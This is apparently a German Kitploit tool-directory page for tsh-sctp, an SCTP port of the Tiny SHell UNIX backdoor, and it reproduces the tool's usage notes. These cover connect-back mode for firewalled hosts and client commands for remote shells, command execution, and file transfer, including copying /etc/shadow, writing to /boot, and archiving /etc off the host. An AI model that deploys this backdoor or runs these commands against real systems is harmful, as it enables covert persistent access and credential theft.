Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
tsh-sctp — TinySHell port to SCTP | Kitploit
Tools/GitHubGitHub/infodox/tsh-sctp
Post-ExploitationPenetration TestingCommand and ControlRed TeamingRemote Access ToolPayload Development
GitHubinfodox/tsh-sctp

tsh-sctp

TinySHell port to SCTP

Repository anzeigen
12528vor 12 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Webseite

Tiny SHell - Eine quelloffene UNIX-Backdoor

root@kitploit:~
* Vor dem Kompilieren von Tiny SHell

    1. Zuerst sollten Sie Ihren geheimen Schlüssel einrichten, der
       sich in tsh.h befindet; der Schlüssel kann beliebig lang sein (verwenden
       Sie mindestens 12 Zeichen für bessere Sicherheit).

    2. Es wird empfohlen, SERVER_PORT zu ändern, den Port, auf dem
       der Server auf eingehende Verbindungen wartet.

    3. Sie möchten tshd möglicherweise im "connect-back"-Modus starten, falls
       es auf einer durch eine Firewall geschützten Maschine läuft; kommentieren Sie einfach
       CONNECT_BACK_HOST in tsh.h aus und ändern Sie es.

* Kompilieren von Tiny SHell

    Führen Sie "make <system>" aus, wobei <system> eines der folgenden sein kann:
    linux, freebsd, openbsd, netbsd, cygwin, sunos, irix, hpux, osf

* Verwendung des Servers

    Es kann nützlich sein, $HOME und die Dateierstellungsmaske
    vor dem Starten des Servers zu setzen:

        % umask 077; HOME=/var/tmp ./tshd

* Verwendung des Clients

    Stellen Sie sicher, dass tshd auf dem entfernten Host läuft. Sie können:

    - eine Shell starten:

        ./tsh <hostname>

    - einen Befehl ausführen:

        ./tsh <hostname> "uname -a"

    - Dateien übertragen:

        ./tsh <hostname> get /etc/shadow .
        ./tsh <hostname> put vmlinuz /boot

    Hinweis: Wenn der Server im Connect-Back-Modus läuft, ersetzen
    Sie den Hostnamen der entfernten Maschine durch "cb".

* Über mehrere Dateiübertragungen

    Derzeit unterstützt Tiny SHell keine scp-ähnlichen mehrfachen
    und/oder rekursiven Dateiübertragungen. Sie können diesen Fehler umgehen,
    indem Sie einfach ein tar-Archiv erstellen und es übertragen. Beispiel:

    ./tsh host "stty raw; tar -cf - /etc 2>/dev/null" | tar -xvf -

* Über Terminalmodi

    Auf einigen hirntoten Systemen (genauer gesagt IRIX und HP-UX) funktionieren
    Strg-C und andere Steuertasten nicht richtig. Beheben Sie es mit:

        % stty intr "^C" erase "^H" eof "^D" susp "^Z" kill "^U"

* Über Sicherheit

    Bitte denken Sie daran, dass der geheime Schlüssel im Klartext in beiden
    ausführbaren Dateien tsh und tshd gespeichert ist; daher sollten Sie sicherstellen,
    dass außer Ihnen niemand Lesezugriff auf diese beiden Dateien hat.
    Sie können jedoch wählen, den echten (gültigen) Schlüssel nicht im
    Client zu speichern, der dann beim Start nach einem Passwort fragt.

* Hinweise zur SCTP-Version:
    Bisher nur auf Archlinux getestet, erwarten Sie, dass es auf allem
    anderen furchtbar scheitert.
    Ist ein ziemlich hässlicher Hack, hat einige Kompilierungsfehler, die ich
    irgendwann ausfindig machen und beheben möchte.
    Die Sicherheit der Backdoor-Datei (tsh) – d.h. das Passwort im Klartext –
    soll bald behoben werden, indem nur ein gehashtes Passwort gespeichert wird.
    Tests auf hpux, *bsd usw., sobald ich Zugang zu solchen Systemen habe.
Tool herunterladen